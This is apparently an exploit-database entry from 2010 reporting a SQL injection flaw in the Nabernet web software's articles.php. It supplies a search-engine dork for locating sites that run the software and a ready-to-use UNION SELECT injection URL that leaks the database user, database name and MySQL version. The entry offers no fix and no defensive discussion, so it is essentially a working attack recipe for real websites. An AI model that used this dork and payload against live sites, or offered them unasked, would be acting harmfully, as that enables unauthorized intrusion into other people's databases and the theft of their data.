id: 10956
date: 02/17/2010
title: Nabernet (articles.php) Sql Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

===================================================
Nabernet (articles.php) Sql Injection Vulnerability
===================================================

Nabernet (articles.php) Sql Injection Vulnerability
==============================================================
 
####################################################################
.:. Author : AtT4CKxT3rR0r1ST 

.:. Bug Type : Sql Injection[Mysql]

.:. Dork : "powered by Nabernet"
 
####################################################################
 
===[ Exploit ]===
 
www.site.com/articles.php?id=null[Sql]
 
www.site.com/articles.php?id=null'+and+1=2+union+select+null,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,null,null,null,null,null,null-- -
 
 
####################################################################



#  0day.today [2023-03-25]  #